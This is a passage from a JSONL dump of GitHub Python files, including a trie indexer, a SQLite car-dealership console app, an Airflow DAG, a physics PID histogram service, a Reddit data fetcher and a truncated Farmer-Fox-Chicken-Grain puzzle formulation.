show(cmds)\n\nasyncio.run(main())\n","repo_name":"lssv6/misque","sub_path":"operations_scripts/dbnormalizer.py","file_name":"dbnormalizer.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30471215795","text":"import re\nfrom pathlib import Path\nfrom typing import Optional\n\n\nclass Node(object):\n\n def __init__(self) -> None:\n self.children: dict = {}\n\n\nclass Document:\n\n def __init__(self, path: str) -> None:\n\n path: Path = Path(path)\n self.doc_id = str(path)[7:].replace(\"\\\\\", \"/\")\n self.word_loc_map = {}\n self.size = 0\n\n content = path.read_text(encoding=\"ascii\", errors=\"ignore\")\n self.__tokenize_document(\n re.sub(r\"[^\\w\\s]\", \"\", content).replace(\"\\n\", \" \"))\n\n def __tokenize_document(self, content: str) -> None:\n start = 0\n while start < len(content):\n\n if content[start].isalnum():\n\n stop = content.find(\" \", start)\n word = content[start:stop]\n self.word_loc_map[word] = self.word_loc_map.get(\n word, []) + [(self.doc_id, start, stop)]\n\n start = stop + 1\n self.size += 1\n\n else:\n start += 1\n\n\nclass Trie:\n\n ENDWORD: str = \"^\"\n\n def __init__(self) -> None:\n\n self._root: Node = Node()\n\n @property\n def tree(self):\n return self._root\n\n @tree.setter\n def tree(self, doc: Document) -> None:\n\n for word, locs in doc.word_loc_map.items():\n node = self._root\n # adding words\n for letter in word:\n\n if letter not in node.children:\n node.children[letter] = Node()\n\n node = node.children[letter]\n\n if Trie.ENDWORD not in node.children:\n node.children[Trie.ENDWORD] = locs\n\n else:\n node.children[Trie.ENDWORD].extend(locs)\n\n def complete(\n self,\n word: str) -> Optional[tuple[str, Optional[tuple[str, int, int]]]]:\n\n tokenized_word = word.split() # prefix tokenization\n\n matches = {}\n\n for w in tokenized_word:\n s = self.match(self._root, w, w)\n\n for i, locs in s:\n matches[i] = matches.get(i, []) + locs\n\n return matches\n\n @staticmethod\n def match(node: Node, prefix: str,\n trace: str) -> Optional[tuple[str, Optional[str]]]:\n\n prefix_matching = []\n\n if prefix == trace:\n\n for prefix_char in trace:\n\n if prefix_char not in node.children:\n return prefix_matching\n\n node = node.children[prefix_char]\n\n for postfix_char in node.children:\n\n if postfix_char == Trie.ENDWORD:\n prefix_matching.extend([(trace, node.children[postfix_char])])\n\n else:\n prefix_matching.extend(\n Trie.match(node.children[postfix_char], prefix,\n trace + postfix_char))\n\n return prefix_matching\n","repo_name":"Qazalbash/Data-Structures","sub_path":"python/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"19002874235","text":"from __future__ import absolute_import\nfrom django.db import models\nfrom rapidsms.models import Contact\n\nclass LogisticsProfile(models.Model):\n organization = models.CharField(max_length=255, blank=True, null=True)\n contact = models.OneToOneField(Contact, null=True, blank=True)\n\n class Meta:\n abstract = True\n \n def get_or_create_contact(self):\n if self.contact is not None:\n return self.contact\n contact = Contact(name=self.user.username)\n contact.save()\n self.contact = contact\n self.save()\n return self.contact\n\n","repo_name":"viyouen/logistics","sub_path":"logistics_project/apps/ewsghana/extensions/logistics/logisticsprofile.py","file_name":"logisticsprofile.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"30026620554","text":"import sqlite3\nimport os.path\n\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\ndb_path = os.path.join(BASE_DIR, \"Project.db\")\nconn = sqlite3.connect(db_path)\nc = conn.cursor()\n\ngCars = []\ngOrderNumber = 0\ngTotal = 0\ngCheck = -1\n\ndef search_car():\n global gTotal\n global gCheck\n global gCars\n\n search = input(\"Enter 1 to search by model; \\tEnter 2 for manufacturer; \\tEnter 3 for transmission; \\tEnter 4 for price: \")\n if search == '1':\n model = input(\"Enter model you are looking for: \")\n query = \"SELECT * FROM car WHERE model = ?\"\n c.execute(query,[model])\n for row in c.fetchall():\n print(row)\n #print(row[0], \" , \", row[1], \" , \", row[2],\" , \", row[3], \" , MPG: \", row[4],\" , Price:$\", row[5],\" , Car ID: \", row[6])\n print(\"(Model,Manufacturer, Stock,Transmission, Fuel Efficiency,Price,Car ID)\")\n \n elif search == '2':\n manu = input(\"Enter manufacturer you are looking for: \")\n query = \"SELECT * FROM car WHERE manufacturer = ?\"\n c.execute(query, [manu])\n for row in c.fetchall():\n print(row)\n #print(row[0], \" , \", row[1], \" , \", row[2],\" , \", row[3], \" , MPG: \", row[4],\" , Price:$\", row[5],\" , Car ID: \", row[6])\n print(\"(Model,Manufacturer, Stock,Transmission, Fuel Efficiency,Price,Car ID)\")\n \n elif search == '3':\n trans = input(\"Enter transmission you are looking for: \")\n query = \"SELECT * FROM car WHERE transmission = ?\"\n c.execute(query, [trans])\n for row in c.fetchall():\n print(row)\n #print(row[0], \" , \", row[1], \" , \", row[2],\" , \", row[3], \" , MPG: \", row[4],\" , Price:$\", row[5],\" , Car ID: \", row[6]) \n print(\"(Model,Manufacturer, Stock,Transmission, Fuel Efficiency,Price,Car ID)\")\n \n elif search == '4':\n value = input(\"Enter the price : \")\n sign = input(\"Enter 1 for greater; Enter 2 for less than: \")\n if sign == '1':\n query = \"SELECT * FROM car WHERE price > ?\"\n c.execute(query, [value])\n for row in c.fetchall():\n print(row)\n #print(row[0], \" , \", row[1], \" , \", row[2],\" , \", row[3], \" , MPG: \", row[4],\" , Price:$\", row[5],\" , Car ID: \", row[6]) \n print(\"(Model,Manufacturer, Stock,Transmission, Fuel Efficiency,Price,Car ID)\")\n \n elif sign == '2':\n query = \"SELECT * FROM car WHERE price < ?\"\n c.execute(query, [value])\n for row in c.fetchall():\n print(row)\n #print(row[0], \" , \", row[1], \" , \", row[2],\" , \", row[3], \" , MPG: \", row[4],\" , Price:$\", row[5],\" , Car ID: \", row[6])\n print(\"(Model,Manufacturer, Stock,Transmission, Fuel Efficiency,Price,Car ID)\")\n \n\ndef cart():\n\n #ID from car search as parameter. \n id = '0'\n global gTotal\n global gCheck\n global gCars\n global gOrderNumber\n\n checkoutid = int(input(\"Enter your checkout ID: \"))\n gCheck = checkoutid + 6000\n\n while id != 'x':\n\n id = input(\"Enter the car id you will like to add to cart; \\tEnter x to exit: \")\n\n query = \"SELECT * FROM car WHERE carid = ?\"\n c.execute(query,[id])\n for row in c.fetchall():\n print(row, \" Has been added to your cart\")\n gCars.append(row[6])\n gTotal = gTotal + row[5]\n \n\ndef payment():\n global gTotal\n global gCheck\n global gCars\n global gOrderNumber\n\n option = '1'\n while option != 'x':\n option = input(\"Enter 1 to checkout; \\tEnter 2 to make payment; \\tEnter 3 to cancel order; \\tEnter x to exit: \")\n if option == '1':\n print(\"Order Placed!\")\n elif option == '2':\n ordernum = int(input(\"Enter your checkout ID : \"))\n ordernum += 6000\n while(gTotal > 0):\n print(\"Amount Due: \", gTotal)\n payment = int(input(\"Enter the amount you wish to pay : \"))\n if(payment < 0 or payment > gTotal):\n print(\"Invalid payment amount. Please try again.\")\n gTotal -= payment\n query = \"UPDATE checkoutservice SET total = (total - ?) WHERE checkoutid = ?\"\n\n c.execute(query,[payment,ordernum])\n\n query2 = \"SELECT total FROM checkoutservice WHERE checkoutid = ?\"\n c.execute(query2,[ordernum])\n for row in c.fetchall():\n print(\"Remaining total: \",row)\n\n conn.commit()\n print(\"Order Complete. You have purchased : \")\n for row in gCars:\n query = \"SELECT * FROM car WHERE carid = ?\"\n c.execute(query,[row])\n for col in c.fetchall():\n print(col)\n elif option == '3':\n custid = int(input(\"Enter your customer ID: \"))\n custid += 3000\n orderid = int(input(\"Enter the order you will like to cancel: \"))\n orderid += 1000\n query = \"SELECT custid FROM customer WHERE custid = ?\"\n c.execute(query, [custid])\n query = \"DELETE FROM customer WHERE ordernumber = ? AND custid = ?\"\n c.execute(query,[orderid,custid])\n query = \"DELETE FROM accountant WHERE ordernumber = ?\"\n c.execute(query,[orderid])\n gTotal = 0\n gCheck = -1\n gCars = []\n gOrderNumber = 0\n print(\"Order has now been deleted\")\n conn.commit()\n\ndef manpayment():\n\n global gTotal\n global gCheck\n global gCars\n global gOrderNumber\n ordernum = int(input(\"Enter your checkout ID to make payment: \"))\n ordernum += 6000\n payment = int(input(\"Enter the amount you wish to pay: \"))\n query = \"UPDATE checkoutservice SET total = (total - ?) WHERE checkoutid = ?\"\n c.execute(query, [payment, ordernum])\n query2 = \"SELECT total FROM checkoutservice WHERE checkoutid = ?\"\n c.execute(query2, [ordernum])\n for row in c.fetchall():\n print(\"New total: \", row)\n\n conn.commit()\n\ndef mancancel():\n global gTotal\n global gCheck\n global gCars\n global gOrderNumber\n\n custid = int(input(\"Enter the customer ID: \"))\n custid += 3000\n query = \"SELECT ordernumber FROM customer WHERE custid = ?\"\n c.execute(query, [custid])\n for row in c.fetchall():\n print(\"Order number for the customer: \", row)\n orderid = int(input(\"Enter the order you will like to cancel: \"))\n orderid += 1000\n\n query = \"DELETE FROM customer WHERE ordernumber = ? AND custid = ?\"\n c.execute(query, [orderid, custid])\n query = \"DELETE FROM accountant WHERE ordernumber = ?\"\n c.execute(query, [orderid])\n print(\"Order has now been deleted\")\n conn.commit()\n\n\ndef manrefund():\n global gTotal\n global gCheck\n global gCars\n global gOrderNumber\n ordernum = int(input(\"Enter the order number to issue the refund: \"))\n ordernum += 1000\n query = \"UPDATE refund SET orderstatus = 'T' WHERE ordernumber = ?\"\n c.execute(query,[ordernum])\n query1 = \"SELECT * FROM refund WHERE ordernumber = ?\"\n c.execute(query1, [ordernum])\n for row in c.fetchall():\n print(\"Refund processed! \" , row)\n\n conn.commit()\n\ndef mandelete():\n global gTotal\n global gCheck\n global gCars\n global gOrderNumber\n custid = '0'\n areyousure = '0'\n\n while custid != \"exit\":\n\n custid = input(\"Enter the customer ID to delete customer info; \\tEnter exit to quit: \")\n newCustID = int(custid)\n newCustID += 3000\n\n while areyousure != 'x':\n\n areyousure = input(\"Are you sure you want to delete this information? \\tEnter y for yes; n for no: \")\n\n if areyousure == 'y':\n\n query = \"DELETE FROM customer WHERE custid = ?\"\n\n c.execute(query, [custid])\n\n areyousure = 'x'\n\n\n\n elif areyousure == 'n':\n\n areyousure = 'x'\n\n\n\n\n\n\n\n\nkey = '100'\n\nwhile key != '3':\n\n key = input(\"Enter 1 to enter customer mode; Enter 2 to enter management mode; Enter 3 to exit: \")\n\n if key == '1':\n\n while key != '0':\n\n request = input(\"Enter 1 to search car; Enter 2 to add to cart or check cart; Enter 3 to checkout or make payment or cancel order; Enter 0 to return to original options: \")\n\n if request == '1':\n search_car()\n elif request == '2':\n cart()\n elif request == '3':\n payment()\n elif request == '0':\n key = '0'\n\n elif key == '2':\n\n password = input(\"Enter management password: \")\n manpass = '1234'\n\n if password == manpass:\n\n while key != '0':\n\n manmode = input(\"Enter 1 to make payment; \\tEnter 2 to cancel order; \\tEnter 3 to issue refund; \\tEnter 4 to delete customer info; \\tEnter 0 to exit: \")\n\n if manmode == '1':\n manpayment()\n elif manmode == '2':\n mancancel()\n elif manmode == '3':\n manrefund()\n elif manmode == '4':\n mandelete()\n elif manmode == '0':\n key = '0'\n elif password != manpass:\n\n print('Access Denied')\n elif key == '3':\n c.close()\n conn.close()","repo_name":"mmendezjimenez/CSE111","sub_path":"Project/Phase3/CarDealership.py","file_name":"CarDealership.py","file_ext":"py","file_size_in_byte":9457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72020620329","text":"from datetime import timedelta\nfrom airflow.decorators import dag, task\nfrom airflow.utils.dates import days_ago\n\nimport requests \n\nENDPOINT = 'https://gorest.co.in/public/v2/posts'\n\ndefault_args = {\n 'start_date': days_ago(1),\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n 'schedule_interval': '@daily',\n 'tags': ['training'],\n 'catchup': False\n}\n\n@dag(\n dag_id = 'extract-decorate',\n default_args=default_args\n)\ndef example_dag():\n @task\n def extract():\n return requests.get(ENDPOINT).json()\n @task\n def transform(data):\n return {'no_records': len(data)}\n @task\n def load(data):\n print(\n f'No. of records fetched by {ENDPOINT}: {data[\"no_records\"]}'\n )\n load(transform(extract()))\ndag = example_dag()","repo_name":"yoonjk/airflow-handson","sub_path":"lab01/extract-decorate.py","file_name":"extract-decorate.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14626400257","text":"#\n# author: J.L. Lanfranchi\n#\n# date: March 2, 2016\n\"\"\"\nPID service using info directly from events.\n\"\"\"\n\nimport collections\nfrom itertools import izip\n\nimport numpy as np\n\nfrom pisa.utils.log import logging\nfrom pisa.pid.PIDServiceBase import PIDServiceBase\nfrom pisa.utils.utils import get_bin_sizes\nimport pisa.utils.flavInt as flavInt\nfrom pisa.utils.events import Events\nfrom pisa.utils.PIDSpec import PIDSpec\nfrom pisa.utils.dataProcParams import DataProcParams\n\n# TODO: implement cuts via pertinent DataProcParams\n\nclass PIDServiceMC(PIDServiceBase):\n \"\"\"\n Takes a PISA events HDF5 file and creates 2D-histogrammed PID in terms of\n energy and coszen, for each specified particle \"signature\" (aka ID).\n \"\"\"\n def __init__(self, ebins, czbins, pid_events, pid_ver,\n pid_remove_true_downgoing, pid_spec=None,\n pid_spec_source=None, compute_error=False,\n #replace_invalid=False, **kwargs):\n replace_invalid=True, **kwargs):\n #super(PIDServiceBase, self).__init__(ebins, czbins)\n super(PIDServiceBase, self).__init__()\n\n self.events_source = None\n self.events = None\n self.cut_events = None\n self.data_proc_params = None\n self.pid_remove_true_downgoing = None\n\n self.pid_ver = None\n self.pid_spec = None\n self.pid_spec_source = pid_spec_source\n\n self.compute_error = compute_error\n self.error_computed = False\n self.replace_invalid = replace_invalid\n\n self.get_pid_kernels(\n ebins=ebins, czbins=czbins, pid_events=pid_events, pid_ver=pid_ver,\n pid_remove_true_downgoing=pid_remove_true_downgoing,\n pid_spec=pid_spec, compute_error=compute_error,\n replace_invalid=replace_invalid,\n )\n\n def get_pid_kernels(self, ebins, czbins, pid_events, pid_ver,\n pid_remove_true_downgoing=None, pid_spec=None,\n compute_error=None, replace_invalid=None):\n \"\"\"Compute and return PID maps\"\"\"\n # Default to values passed when class was instantiated\n if pid_remove_true_downgoing is None:\n pid_remove_true_downgoing = self.pid_remove_true_downgoing\n if replace_invalid is None:\n replace_invalid = self.replace_invalid\n if compute_error is None:\n compute_error = self.compute_error\n\n # TODO: add stateful return-early logic\n #if ebins == self.ebins and \\\n # czbins == self.czbins and \\\n # pid_events == self.events_source and \\\n # pid_ver == self.pid_ver and \\\n # pid_spec == self.pid_spec and \\\n # (not compute_error or (compute_error == self.compute_error)):\n # return\n self.ebins = ebins\n self.czbins = czbins\n\n histo_binspec = (self.ebins, self.czbins)\n n_ebins = len(self.ebins) - 1\n n_czbins = len(self.czbins) - 1\n self.compute_error = compute_error\n logging.info('Updating PIDServiceMC PID histograms...')\n\n self.pid_remove_true_downgoing = pid_remove_true_downgoing\n\n new_events = False\n if self.events is None or pid_events != self.events_source:\n new_events = True\n if isinstance(pid_events, basestring):\n logging.info('Extracting events from file: %s' % (pid_events))\n self.events = Events(pid_events)\n elif isinstance(pid_events, Events):\n # Validate by (re)instantiating as an Events object\n self.events = pid_events\n else:\n raise TypeError('Unhandled `pid_events` type: \"%s\"' %\n type(pid_events))\n should_be_joined = sorted([\n flavInt.NuFlavIntGroup('nuecc+nuebarcc'),\n flavInt.NuFlavIntGroup('numucc+numubarcc'),\n flavInt.NuFlavIntGroup('nutaucc+nutaubarcc'),\n flavInt.NuFlavIntGroup('nuallnc+nuallbarnc'),\n ])\n are_joined = sorted([\n flavInt.NuFlavIntGroup(s)\n for s in self.events.metadata['flavints_joined']\n ])\n if are_joined != should_be_joined:\n raise ValueError('Events passed have %s joined groupings but'\n ' it is required to have %s joined groupings.'\n % (are_joined, should_be_joined))\n self.events_source = pid_events\n self.data_proc_params = DataProcParams(\n detector=self.events.metadata['detector'],\n proc_ver=self.events.metadata['proc_ver']\n )\n\n if new_events or (self.cut_events is None) or \\\n (pid_remove_true_downgoing != self.pid_remove_true_downgoing):\n if pid_remove_true_downgoing:\n self.cut_events = self.data_proc_params.applyCuts(\n self.events, cuts='true_upgoing_coszen'\n )\n else:\n self.cut_events = self.events\n self.pid_remove_true_downgoing = pid_remove_true_downgoing\n\n if new_events or (self.pid_spec is None) or (pid_ver != self.pid_ver):\n self.pid_spec = PIDSpec(\n detector=self.events.metadata['detector'],\n geom=self.events.metadata['geom'],\n proc_ver=self.events.metadata['proc_ver'],\n pid_specs=self.pid_spec_source\n )\n self.signatures = self.pid_spec.get_signatures()\n\n # TODO: add importance weights, error computation\n\n logging.info(\"Separating events by PID...\")\n self.separated_events = self.pid_spec.applyPID(\n events=self.cut_events,\n return_fields=['reco_energy', 'reco_coszen', 'weighted_aeff'],\n )\n\n self.pid_kernels = {'binning': {'ebins': self.ebins,\n 'czbins': self.czbins}}\n self.pid_kernels_rel_error = {'binning': {'ebins': self.ebins,\n 'czbins': self.czbins}}\n for label in ['nue_cc', 'numu_cc', 'nutau_cc', 'nuall_nc']:\n rep_flavint = flavInt.NuFlavIntGroup(label)[0]\n self.pid_kernels[label] = {}\n raw_histo = {}\n raw_histo_err = {}\n total_histo = np.zeros([n_ebins, n_czbins])\n total_histo_check = None\n if self.compute_error:\n total_err2 = np.zeros([n_ebins, n_czbins])\n\n for sig in self.signatures:\n flav_sigdata = self.separated_events[rep_flavint][sig]\n reco_e = flav_sigdata['reco_energy']\n reco_cz = flav_sigdata['reco_coszen']\n try:\n weights = flav_sigdata['importance_weight']\n #weights = flav_sigdata['weighted_aeff']\n weights2 = weights * weights\n weights_check = self.cut_events[rep_flavint]['importance_weight']\n #weights_check = self.cut_events[rep_flavint]['weighted_aeff']\n except:\n logging.warn('No importance weights found in events!')\n weights = None\n weights2 = None\n weights_check = None\n raw_histo[sig], _, _ = np.histogram2d(\n reco_e,\n reco_cz,\n weights=weights,\n bins=histo_binspec,\n )\n total_histo += raw_histo[sig]\n\n if self.compute_error:\n raw_histo_err[sig], _, _ = np.histogram2d(\n reco_e,\n reco_cz,\n weights=weights2,\n bins=histo_binspec,\n )\n total_err2 += raw_histo_err[sig] / \\\n (np.clip(raw_histo[sig], 1, np.inf)**2)\n self.error_computed = True\n\n for sig in self.signatures:\n self.pid_kernels[label][sig] = raw_histo[sig] / total_histo\n if np.any(total_histo == 0):\n self.pid_kernels[label][sig] = np.nan_to_num(self.pid_kernels[label][sig])\n\n invalid_idx = total_histo == 0\n valid_idx = 1-invalid_idx\n invalid_idx = np.where(invalid_idx)[0]\n num_invalid = len(invalid_idx)\n\n message = 'Group \"%s\", PID signature \"%s\" has %d invalid' \\\n ' entry(ies)!' % (label, sig, num_invalid)\n\n if num_invalid > 0 and not replace_invalid:\n pass\n #raise ValueError(message)\n\n replace_idx = []\n if num_invalid > 0 and replace_invalid:\n logging.warn(message)\n valid_idx = np.where(valid_idx)[0]\n for idx in invalid_idx:\n dist = np.abs(valid_idx-idx)\n nearest_valid_idx = valid_idx[np.where(dist==np.min(dist))[0][0]]\n replace_idx.append(nearest_valid_idx)\n self.pid_kernels[label][sig][idx] = \\\n self.pid_kernels[label][sig][nearest_valid_idx]\n\n # Relative error is same for all signatures, since equations\n # implemented are\n # pidhist_x / (pidhist_x + pidhist_y + ...)\n # pidhist_y / (pidhist_x + pidhist_y + ...)\n # ...\n if self.compute_error:\n if replace_invalid:\n for orig_idx, repl_idx in izip(invalid_idx, replace_idx):\n total_err2[orig_idx] = total_err2[repl_idx]\n #total_err2[total_err2 == 0] = \\\n # np.min(total_err2[total_err2 != 0])\n self.pid_kernels_rel_error[label] = np.sqrt(total_err2)\n\n return self.pid_kernels\n\n def get_pid(self, **kwargs):\n \"\"\"Returns the PID maps\"\"\"\n return self.pid_kernels\n \n def get_rel_error(self):\n \"\"\"Returns the PID maps' relative error\"\"\"\n assert self.error_computed\n return self.pid_kernels_rel_error\n\n @staticmethod\n def add_argparser_args(parser):\n parser.add_argument(\n '--pid-events', metavar='RESOURCE_NAME', type=str,\n default='events/pingu_v36/events__pingu__v36__runs_388-390__proc_v5__joined_G_nue_cc+nuebar_cc_G_numu_cc+numubar_cc_G_nutau_cc+nutaubar_cc_G_nuall_nc+nuallbar_nc.hdf5',\n help='''[ PID-MC ] PISA-standard events file'''\n )\n parser.add_argument(\n '--pid-ver', type=str,\n default='1',\n help='''[ PID-MC ] Version of PID to use (as defined for this\n detector/geometry/processing)'''\n )\n parser.add_argument(\n '--pid-remove-true-downgoing', action='store_true',\n help='''[ PID-MC ] Remove MC-true-downgoing events'''\n )\n parser.add_argument(\n '--pid-spec-source', default='pid/pid_specifications.json',\n help='''[ PID-MC ] Resource for loading PID specifications'''\n )\n parser.add_argument(\n '--compute-error', action='store_true',\n help='''[ PID-MC ] Compute histogram errors'''\n )\n parser.add_argument(\n '--replace-invalid', action='store_true',\n help='''[ PID-MC ] Replace invalid histogram entries with nearest\n neighbor's value'''\n )\n return parser\n","repo_name":"yanshu/pisa","sub_path":"pisa/pid/PIDServiceMC.py","file_name":"PIDServiceMC.py","file_ext":"py","file_size_in_byte":11613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31785307697","text":"import pandas as pd\nimport RedditReadonlyService\n\nclientId = \"\" # your bots client id\nclientSecret = \"\" # your bots client secret\nuserAgent = \"\" # your bots user agent\n\nredditReadOnly = RedditReadonlyService.getRedditReadOnly()\n\nsubmissionsDict = {\n \"author\": [],\n \"author_fullname\": [],\n \"created_utc\": [],\n \"id\": [],\n \"num_comments\": [],\n \"permalink\": [],\n \"score\": [],\n \"selftext\": [],\n \"subreddit\": [],\n \"title\": [],\n \"upvote_ratio\": [],\n \"url\": []\n}\nsubmissionsDataFrame = pd.read_csv ('data/Brew-Crew-Submissions.csv')\nfor index, row in submissionsDataFrame.iterrows():\n submissionDataFrame = redditReadOnly.submission(row['id'])\n submission = redditReadOnly.submission(submissionDataFrame.id)\n submissionsDict[\"author\"].append(submission.author)\n submissionsDict[\"author_fullname\"].append(submission.author_fullname)\n submissionsDict[\"created_utc\"].append(submission.created_utc)\n submissionsDict[\"id\"].append(submission.id)\n submissionsDict[\"num_comments\"].append(submission.num_comments)\n submissionsDict[\"permalink\"].append(submission.permalink)\n submissionsDict[\"score\"].append(submission.score)\n submissionsDict[\"selftext\"].append(submission.selftext)\n submissionsDict[\"subreddit\"].append(submission.subreddit)\n submissionsDict[\"title\"].append(submission.title)\n submissionsDict[\"upvote_ratio\"].append(submission.upvote_ratio)\n submissionsDict[\"url\"].append(submission.url)\n\n# Saving the data in a pandas dataframe\nsubmissionsDataFrame = pd.DataFrame(submissionsDict)\n\n# Save data frame to csv\nsubmissionsDataFrame.to_csv(\"data/Brew-Crew-Submissions-2022.csv\", index=True, index_label=\"index\")","repo_name":"andersbuck/reddit-meetup-data","sub_path":"scripts/2-fetch-submissions.py","file_name":"2-fetch-submissions.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33051245802","text":"\n\ndef from_file(path):\n with open(path, 'r') as handle:\n return [int(line) for line in handle.readlines()[1:]]\n\n\ndef mwis(path):\n A = [0, path[0]]\n for i in range(2, len(path) + 1):\n A.append(max((A[i-1], A[i-2] + path[i-1])))\n return reconstruct(path, A)\n\n\ndef reconstruct(path, A):\n S = []\n test_bits = [1, 2, 3, 4, 17, 117, 517, 997]\n i = len(A)-1\n while i > 1:\n # Do not include node\n if A[i-1] >= A[i-2] + path[i-1]:\n i -= 1\n # Include node and exclude next node\n else:\n S.append(i)\n i -= 2\n # Check our base cases\n if i == 1:\n S.append(1)\n # Reverse the created string as we are travelling backwards\n ans = ''.join([str(int(bit in S)) for bit in test_bits])\n return ans\n","repo_name":"Wenchonghe/stanford-algs","sub_path":"greedy-algorithms/assignment_3/mwis.py","file_name":"mwis.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"33704539305","text":"# This is kind of messy, these should probably be more centralized\nfrom portal.planning.objects import *\n\nclass Predicate:\n def __init__(self, name, types):\n self.name = name\n self.types = types\n\n def __call__(self, *args):\n if len(self.types) != len(args):\n raise Exception('wrong number of arguments in predicate (%s %s)' %\n (self.name, ' '.join([arg.name for arg in args])))\n\n for typ, obj in zip(self.types, args):\n if not isinstance(obj, typ):\n raise Exception('%s does not have type %s in predicate (%s %s)' %\n (obj.name, typ.type(), self.name,\n ' '.join([arg.name for arg in args])))\n return PredicateInstance(self, args)\n\nclass PredicateInstance:\n def __init__(self, predicate, args):\n self.predicate = predicate\n self.args = args\n\n def serialize(self):\n return [self.predicate.name] + [arg.name for arg in self.args]\n\n def __hash__(self):\n return hash((self.predicate.name, self.args))\n\n def __eq__(self, other):\n return self.predicate == other.predicate and self.args == other.args\n\n def __repr__(self):\n return '(%s %s)' % (self.predicate.name, ' '.join([arg.name for arg in self.args]))\n\nAt = Predicate(\n 'at', [Entity, Location]\n)\nConnected = Predicate(\n 'connected', [Location, Location]\n)\nCarrying = Predicate(\n 'carrying', [Player, Item]\n)\nConnectorConnects = Predicate(\n 'connector-connects', [Connector, Room, Room]\n)\nDoorRequires = Predicate(\n 'door-requires', [Door, Button]\n)\nCanCreatePortal = Predicate(\n 'can-create-portal', [Player, Portal]\n)\nCanCreatePortalAt = Predicate(\n 'can-create-portal-at', [Location, Location]\n)\n","repo_name":"michaelelin/portal_planner","sub_path":"portal/planning/predicates.py","file_name":"predicates.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40465671278","text":"'''vasum_Farmer_Fox.py\r\nby Vasu Mehra\r\n\r\nAssignment 2, in CSE 415, Spring 2019.\r\n \r\nThis file contains my problem formulation for the problem of\r\nthe Farmer, Fox, Chicken, and Grain.\r\n'''\r\n#\r\nSOLUZION_VERSION = \"2.0\"\r\nPROBLEM_NAME = \"Farmer, Chicken, Fox, Grain\"\r\nPROBLEM_VERSION = \"2.0\"\r\nPROBLEM_AUTHORS = ['S. Tanimoto']\r\nPROBLEM_CREATION_DATE = \"17-APRIL-2019\"\r\n\r\n# The following field is mainly for the human solver, via either the Text_SOLUZION_Client.\r\n# or the SVG graphics client.\r\nPROBLEM_DESC=\\\r\n '''The \"Missionaries and Cannibals\" problem is a traditional puzzle\r\nin which the player starts off with three missionaries and three cannibals\r\non the left bank of a river. The object is to execute a sequence of legal\r\nmoves that transfers them all to the right bank of the river. In this\r\nversion, there is a boat that can carry at most three people, and one of\r\nthem must be a missionary to steer the boat. It is forbidden to ever\r\nhave one or two missionaries outnumbered by cannibals, either on the\r\nleft bank, right bank, or in the boat. In the formulation presented\r\nhere, the computer will not let you make a move to such a forbidden situation, and it\r\nwill only show you moves that could be executed \"safely.\"\r\n'''\r\n#\r\n\r\n#\r\n#\r\nFarmer = 0\r\nFox = 1\r\nChicken = 2\r\nGrain = 3\r\nLEFT = 0\r\nRIGHT = 1\r\n\r\nclass State():\r\n\r\n\tdef __init__(self, d=None):\r\n\t\tif d==None: \r\n\t\t d = {'people':[[0,0],[0,0],[0,0],[0,0]],\r\n\t\t 'boat':LEFT}\r\n\t\tself.d = d\r\n\r\n\tdef __eq__(self,s2):\r\n\t for prop in ['people', 'boat']:\r\n\t if self.d[prop] != s2.d[prop]: return False\r\n\t return True\r\n\r\n\tdef __str__(self):\r\n\t p = self.d['people']\r\n\t txt = \"\\n Farmer on left:\"+str(p[Farmer][LEFT])+\"\\n\"\r\n\t txt += \" Fox on left:\"+str(p[Fox][LEFT])+\"\\n\"\r\n\t txt += \" Chicken on left:\"+str(p[Chicken][LEFT])+\"\\n\"\r\n\t txt += \" Grain on left:\"+str(p[Grain][LEFT])+\"\\n\"\r\n\t txt = \" Farmer on right:\"+str(p[Farmer][RIGHT])+\"\\n\"\r\n\t txt += \" Fox on right:\"+str(p[Fox][RIGHT])+\"\\n\"\r\n\t txt += \" Chicken on right:\"+str(p[Chicken][RIGHT])+\"\\n\"\r\n\t txt += \" Grain on right:\"+str(p[Grain][RIGHT])+\"\\n\"\r\n\t side='left'\r\n\t if self.d['boat']==1: side='right'\r\n\t txt += \" boat is on the \"+side+\".\\n\"\r\n\t return txt\r\n\r\n\tdef __hash__(self):\r\n\t\treturn (self.__str__()).__hash__()\r\n\r\n\tdef copy(self):\r\n\t # Performs an appropriately deep copy of a state,\r\n\t # for use by operators in creating new states.\r\n\t news = State({})\r\n\t news.d['people']=[self.d['people'][F_F_C_G][:] for F_F_C_G in [Farmer, Fox, Chicken, Grain]]\r\n\t news.d['boat'] = self.d['boat']\r\n\t return news \r\n\r\n\tdef can_move (self, farmer, fox, chic, grain):\r\n\t\tside = self.d['boat'] # Where the boat is.\r\n\t\tp = self.d['people']\r\n\t\tif(farmer != 1):\r\n\t\t\treturn False\r\n\r\n\t\tFarmer_present = p[Farmer][side]\r\n\t\tFox_present = p[Fox][side]\r\n\t\tChicken_present = p[Chicken][side]\r\n\t\tGrain_present = p[Grain][side]\r\n\t\tif Farmer_present < farmer:\r\n\t\t\treturn False\r\n\t\tif Fox_present < fox:\r\n\t\t\treturn False\r\n\t\tif Chicken_present < chic:\r\n\t\t\treturn False\r\n\t\tif Grain_present < grain:\r\n\t\t\treturn False\r\n\t\t\r\n\t\tFarmer_Left = Farmer_present - farmer\r\n\t\tFox_Left = Fox_present - fox\r\n\t\tChicken_Left = Chicken_present - 